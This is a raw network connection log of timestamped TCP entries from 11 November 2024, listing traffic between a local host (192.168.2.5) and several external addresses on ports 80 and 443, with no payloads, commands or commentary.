Nov 11, 2024 10:33:19.843717098 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.843823910 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.852647066 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.852672100 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:19.857543945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.857554913 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.857570887 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.857580900 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:19.977616072 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:19.977632046 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:19.977689981 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:19.978135109 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:19.978151083 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.134401083 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:20.134414911 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:20.134488106 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:20.135529995 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:20.135543108 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:20.276617050 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:20.276670933 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:20.276758909 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:20.292059898 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:20.292076111 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:20.296463966 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.296526909 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.306269884 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.306288004 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.306530952 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.322212934 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.367332935 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.459697962 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.459726095 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.459742069 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.459779024 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.459800005 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.459813118 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.459841967 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.495928049 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.495949030 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.496007919 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.496022940 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.496067047 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.541091919 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.541115999 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.541157961 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.541173935 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.541208029 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.541225910 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.564604044 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.569111109 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:20.569125891 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.570220947 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.570270061 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:20.576286077 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.576302052 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.576343060 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.576349974 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.576384068 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.576910019 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:20.576987982 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.579896927 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.579911947 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.579971075 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.579977036 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.580001116 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.580020905 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.581928015 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.581943035 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.582005978 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.582012892 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.582104921 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.582304955 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.622519970 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.622538090 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.622622967 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.622631073 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.622673035 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.656234980 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.656255007 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.656316042 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.656326056 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.656362057 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.656941891 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.656958103 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.657010078 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.657016039 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.657053947 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.657919884 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.657934904 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.657980919 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.657985926 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.658023119 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.658602953 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.658615112 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.658655882 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.658660889 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.658688068 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.658701897 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.661361933 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.661375999 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.661446095 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.661449909 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.661487103 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.662683964 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.662698984 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.662751913 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.662756920 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.662796974 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.702822924 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.702894926 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.702908039 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.702955008 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.770296097 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:20.770304918 CET	443	49755	18.244.18.122	192.168.2.5
Nov 11, 2024 10:33:20.876866102 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:20.876945972 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:20.882838964 CET	49755	443	192.168.2.5	18.244.18.122
Nov 11, 2024 10:33:20.899950981 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.900580883 CET	49745	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:20.900597095 CET	443	49745	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:20.993730068 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:20.993809938 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:21.017079115 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.017143011 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.053507090 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.053529978 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.053800106 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.139715910 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.139769077 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.139889956 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.141767025 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.141782999 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.141922951 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.172012091 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.172027111 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.172096014 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.176937103 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.176950932 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.177045107 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.177067041 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.178149939 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.178160906 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.179290056 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.179301977 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.179358959 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.179435015 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.179445028 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.179528952 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.179528952 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.179541111 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.182980061 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.182991982 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.186732054 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.247797012 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:21.252563953 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:21.686816931 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:21.686830997 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:21.687169075 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:21.690220118 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:21.690332890 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:21.690356016 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:21.695229053 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.697043896 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.697314024 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.697325945 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.697695971 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.704320908 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.707730055 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.707746029 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.708794117 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.708798885 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.709609032 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.709624052 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.710289001 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.710294008 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.711846113 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.711858988 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.712369919 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.712373972 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.714077950 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.714091063 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.714847088 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.714853048 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.715117931 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.715145111 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.715688944 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.715692997 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.751328945 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.797770023 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.797934055 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.798116922 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.798882008 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.798911095 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.798966885 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.798976898 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.798988104 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.799050093 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.800002098 CET	49767	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.800014019 CET	443	49767	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.801461935 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.801486969 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.801548004 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.801556110 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.801568031 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.801601887 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.801647902 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.802203894 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.802212954 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.802222013 CET	49766	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.802226067 CET	443	49766	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.802870035 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.802870989 CET	49764	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.802875996 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.802879095 CET	443	49764	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805258036 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805277109 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805332899 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805372000 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.805372000 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805428028 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.805520058 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.805639982 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.808034897 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.808058023 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.808072090 CET	49763	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.808078051 CET	443	49763	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.808736086 CET	49765	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.808742046 CET	443	49765	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.819586039 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.819622040 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.819838047 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.821764946 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.821779966 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.827071905 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.827100039 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.827297926 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.827610970 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.827621937 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.828711033 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.828741074 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.828897953 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.829726934 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.829741955 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.829807997 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.831401110 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.831413984 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.831579924 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.831743002 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.831760883 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.831885099 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.831892967 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.832201958 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:21.832222939 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:21.941714048 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941741943 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941750050 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941781044 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941798925 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941812038 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941869020 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.941884995 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.941909075 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.941939116 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.942694902 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.942703962 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.942790031 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:21.942796946 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.948133945 CET	80	49747	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:21.948240042 CET	49747	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:21.963648081 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:21.998025894 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:21.998131037 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:22.030864000 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.030914068 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.030977964 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.031419992 CET	49782	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.031435013 CET	443	49782	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.032412052 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.032438993 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.032475948 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:22.032562971 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.032686949 CET	49783	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.032687902 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.032702923 CET	443	49783	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.035396099 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.035408974 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:22.035422087 CET	49760	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.035428047 CET	443	49760	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:22.044142962 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.044179916 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.044229984 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.045126915 CET	49784	443	192.168.2.5	172.64.41.3
Nov 11, 2024 10:33:22.045139074 CET	443	49784	172.64.41.3	192.168.2.5
Nov 11, 2024 10:33:22.170244932 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.170274019 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.170435905 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.170717955 CET	49785	443	192.168.2.5	142.250.186.161
Nov 11, 2024 10:33:22.170732975 CET	443	49785	142.250.186.161	192.168.2.5
Nov 11, 2024 10:33:22.297132969 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.297183990 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:22.297236919 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.297620058 CET	49786	443	192.168.2.5	40.126.31.69
Nov 11, 2024 10:33:22.297631025 CET	443	49786	40.126.31.69	192.168.2.5
Nov 11, 2024 10:33:22.334692955 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.335375071 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.335396051 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.336513996 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.336519957 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.340334892 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.340869904 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.340897083 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.341536999 CET	49776	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.341542959 CET	443	49776	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.344664097 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.345000982 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.345024109 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.345500946 CET	49778	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.345508099 CET	443	49778	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.345683098 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.346227884 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.346251965 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.346959114 CET	49777	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.346962929 CET	443	49777	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.349667072 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.349962950 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.349972963 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.350563049 CET	49779	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.350568056 CET	443	49779	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.424191952 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:22.424191952 CET	49761	443	192.168.2.5	4.245.163.56
Nov 11, 2024 10:33:22.424222946 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:22.424235106 CET	443	49761	4.245.163.56	192.168.2.5
Nov 11, 2024 10:33:22.428183079 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.428236961 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.428462029 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.428646088 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.428653955 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.428689003 CET	49775	443	192.168.2.5	13.107.246.45
Nov 11, 2024 10:33:22.428694963 CET	443	49775	13.107.246.45	192.168.2.5
Nov 11, 2024 10:33:22.432787895 CET	443	49776	13.107.246.45	192.168.2.5
